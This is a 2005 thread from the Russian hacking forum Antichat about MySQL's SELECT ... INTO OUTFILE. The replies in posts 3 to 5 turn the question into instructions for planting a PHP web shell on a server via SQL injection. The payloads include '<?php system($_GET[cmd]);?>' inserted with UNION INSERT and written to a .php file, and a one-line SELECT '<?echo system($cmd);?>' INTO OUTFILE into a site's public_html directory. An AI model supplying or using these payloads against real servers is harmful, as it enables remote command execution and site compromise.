ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

outfile в mysql
  #1  
Старый 10.11.2005, 08:59
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


Question outfile в mysql

как пользоваться этим запросом?
outfile last_title FROM `blablabla` WHERE id=11 into 1.txt.. у меня ни4е не выходит..
и еще.. могу я с пом. этого запроса записать в 1.txt что нибудь другое, не используя таблицы?
 

  #2  
Старый 10.11.2005, 09:21
K[o]S
Новичок
Регистрация: 29.07.2005
Сообщений: 20
Провел на форуме:
357093

Репутация: 13
По умолчанию

select last_title FROM `blablabla` WHERE id=11 into outfile /путь в директории/1.txt
Не факт что сработает так как привелегия file для простых пользователей отключается.
 

  #3  
Старый 11.11.2005, 16:52
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
могу я с пом. этого запроса записать в 1.txt что нибудь другое, не используя таблицы?
Думаю нет,нужно сначала что-нить(код шелла например) добавить в таблицу,потом уже в файл.
 

  #4  
Старый 01.12.2005, 09:18
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

union insert into blablabla(last_title) values('<?php system($_GET[cmd]);?>')
а далее
select last_title FROM blablabla into outfile /путь в директории/1.php
__________________

 

  #5  
Старый 02.12.2005, 01:31
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

не нужно ничего добавлять в таблицы итп. INTO OUTFILE работает с SELECT, т.е. будет работать фанарное SELECT '<?echo system($cmd);?>' INtO OUTFILE "../../../../home/site/public_html/sex.php";
А вообще
http://dev.mysql.com/doc/
 

  #6  
Старый 02.12.2005, 02:14
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

Говорят не работает вот и пишу как еще можно!
__________________

 

  #7  
Старый 02.12.2005, 06:35
Trinux
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,149
Провел на форуме:
941818

Репутация: 569


По умолчанию

Говорят что кур доят =) Самая большая проблема человечества - мы не верим своим близким и всерьез воспринимаем слова незнакомых людей =)))
 

  #8  
Старый 02.12.2005, 07:26
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

Ну да это не важно когданить они всему этому тоже научяться а пока мы должны помогать не даром мы Грины
__________________

 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
вопрос про mySql уязвимость Kent Уязвимости 6 19.07.2005 01:01
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41
Есть даные БД с phpbb 2.0.08. Как вывести таблицу пользователей? quer Форумы 11 16.04.2005 11:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ